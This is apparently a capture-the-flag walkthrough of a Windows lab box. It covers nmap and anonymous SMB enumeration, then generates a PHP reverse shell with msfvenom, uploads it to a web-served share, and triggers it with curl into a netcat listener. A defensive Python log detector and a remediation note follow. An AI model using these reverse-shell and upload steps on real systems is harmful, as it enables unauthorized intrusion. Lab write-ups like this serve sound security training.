# AllSignsPoint2Pwnage (WIP)

## Nmap

```
sudo nmap 10.10.54.102 -p- -sS -sV -Pn

Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5040/tcp  open  unknown
5900/tcp  open  vnc           VNC (protocol 3.8)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

First up, checking FTP shows we can log in anonymously. Listing the contents from there only shows notice.txt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1cf9d2e3280b1dae6591a562bff796d91c861ebd%2Fimage.png?alt=media)

Viewing the contents reveals a hidden SMB share called 'images'. The notice also implies that uploads to the share are possible.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9a7e70b823495297f8ed2b52ea956c07674c113e%2Fimage.png?alt=media)

Checking for shares with smbclient.

```
smbclient -U '' -L \\\\10.10.54.102\\
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf1ba35d0452d70e03ab3a3fd5314153ab6f4ca5%2Fimage.png?alt=media)

We can then connect to the images$ share, list the contents and confirm that file upload works with the `put` command using test.txt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b365d4ff5c4322ba6fd650ac6b07d248260b5e%2Fimage.png?alt=media)

Browsing to port 80 to check out the web server, we are presented with a slideshow. Using the context menu to save one of the images shows its filename, which matches a file in the SMB share.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-60a368d84cff443573d945d82c4e567ec51f1e25%2Fimage.png?alt=media)

We can test whether test.txt is reachable through the web server to confirm that uploaded files are served from the web root (and so could be executed if they are scripts). We can try the /images/ directory, as we know a share by that name exists.

```
curl http://10.10.54.102/images/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d389543615540367b85a4534adc5b4c406b5e081%2Fimage.png?alt=media)

Knowing this works, we can start working towards a reverse shell. Checking the web server with Nikto shows it is powered by PHP, which the Apache banner in the Nmap output (PHP/7.4.11) already indicated.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32909ecfd586977b5694bf727faaf2c532e3f2ff%2Fimage.png?alt=media)

The plan is to create a PHP reverse shell and upload it to the SMB share. We can generate one with msfvenom as shown below.

```
msfvenom -p php/reverse_php LHOST=10.14.3.108 LPORT=80 -f raw > phpreverseshell.php
```

Then upload the shell to the SMB share.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03f83bea97a10334805359db0b5a6fc3a7683f39%2Fimage.png?alt=media)

Open a `netcat` listener on the port specified in the payload.

```
sudo nc -lvp 80
```

Then execute the shell with curl.

```
curl http://10.10.54.102/images/phpreverseshell.php
```

This connects back to our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b246fcac544d2e8aefe02d21c70b02417f5ca3%2Fimage.png?alt=media)
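The chain above works because an anonymously writable share is mapped into the web root and Apache hands `.php` files in it to the script engine. From the defender's side, the telltale in the web logs is a request for a script extension under a directory that should only ever serve images. The following is an added example (not part of the original writeup) that flags such requests in Apache combined-format access logs; the log lines, timestamps and the `/images/` upload-directory assumption are constructed to mirror this box.

```python
"""Flag requests for server-side scripts under an upload-only web directory.

Added example, not from the original writeup. Assumes Apache combined-format
access logs and that /images/ should only ever serve static image files.
"""
import re
from typing import Iterable

# Constructed sample log mirroring the walkthrough: the uploaded text file is
# fetched first, then a PHP file in the same upload directory is requested.
SAMPLE_LOG = """\
10.14.3.108 - - [10/Nov/2020:21:03:11 +0000] "GET /images/test.txt HTTP/1.1" 200 5 "-" "curl/7.72.0"
10.14.3.108 - - [10/Nov/2020:21:03:15 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.14.3.108 - - [10/Nov/2020:21:04:02 +0000] "GET /images/phpreverseshell.php HTTP/1.1" 200 0 "-" "curl/7.72.0"
10.14.3.108 - - [10/Nov/2020:21:04:10 +0000] "GET /images/5.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions that Apache with PHP would execute rather than serve as raw bytes.
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")
# Directories that are writable through a file share and should hold images only (assumed).
UPLOAD_DIRS = ("/images/",)


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_script_requests(lines: Iterable[str], upload_dirs=UPLOAD_DIRS):
    """Return parsed entries where a script extension was requested under an
    upload directory. The query string is stripped before checking the path."""
    hits = []
    for raw in lines:
        entry = parse_line(raw.strip())
        if not entry:
            continue
        path = entry["path"].split("?", 1)[0].lower()
        if path.startswith(upload_dirs) and path.endswith(SCRIPT_EXT):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for h in find_script_requests(SAMPLE_LOG.splitlines()):
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["status"]}')
```

The corresponding fix on the server is to stop the share from being writable to anonymous users and to remove the PHP handler for the image directory, so that a `.php` file dropped there is served as text or denied rather than executed.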
